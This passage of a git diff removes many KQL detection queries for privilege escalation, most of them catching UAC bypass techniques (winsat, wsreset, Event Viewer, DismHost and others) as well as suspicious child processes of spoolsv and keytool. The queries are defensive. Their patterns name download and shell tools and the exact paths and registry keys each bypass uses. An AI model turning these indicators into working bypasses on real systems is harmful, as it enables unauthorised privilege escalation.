-| where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" and ProcessCommandLine contains "/f"))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Service_Path_Modification.kql b/Privilege Escalation/Suspicious_Service_Path_Modification.kql
deleted file mode 100644
index f0c3811c..00000000
--- a/Privilege Escalation/Suspicious_Service_Path_Modification.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: high
-// Description: Detects service path modification via the "sc" binary to a suspicious command or path
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql b/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql
deleted file mode 100644
index 9e6385cb..00000000
--- a/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
-// Date: 2021/07/11
-// Level: high
-// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
-// Tags: attack.execution, attack.t1203, attack.privilege_escalation, attack.t1068
-DeviceProcessEvents
-| where (ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql b/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
deleted file mode 100644
index 8d57f867..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
deleted file mode 100644
index 503d8c5f..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
deleted file mode 100644
index 979b06ac..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql b/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql
deleted file mode 100644
index ba29c60d..00000000
--- a/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/31
-// Level: high
-// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql b/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
deleted file mode 100644
index f8815880..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql b/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql
deleted file mode 100644
index c912f517..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
deleted file mode 100644
index c45c8dd3..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
deleted file mode 100644
index b14f6498..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql b/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql
deleted file mode 100644
index 949e3b2b..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_DismHost.kql b/Privilege Escalation/UAC_Bypass_Using_DismHost.kql
deleted file mode 100644
index 63f130be..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_DismHost.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql b/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql
deleted file mode 100644
index 3043fd99..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql b/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
deleted file mode 100644
index 974b22fe..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/22
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql
deleted file mode 100644
index 26df3a86..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
deleted file mode 100644
index 25b12cc5..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql
deleted file mode 100644
index 1ca85fad..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql
deleted file mode 100644
index eaf21560..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql b/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
deleted file mode 100644
index 7d63fa2a..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: high
-// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
deleted file mode 100644
index cadc4f08..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
deleted file mode 100644
index ebc4f60d..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
deleted file mode 100644
index 79b84858..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
deleted file mode 100644
index a2dfe81e..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\"  /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql b/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql
deleted file mode 100644
index 594500b1..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
deleted file mode 100644
index ef7a7239..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
deleted file mode 100644
index 96f8c1bd..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
deleted file mode 100644
index dc52850a..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql b/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql
deleted file mode 100644
index 7ddbf642..00000000
--- a/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/07
-// Level: high
-// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_WSReset.kql b/Privilege Escalation/UAC_Bypass_WSReset.kql
deleted file mode 100644
index b39549cb..00000000
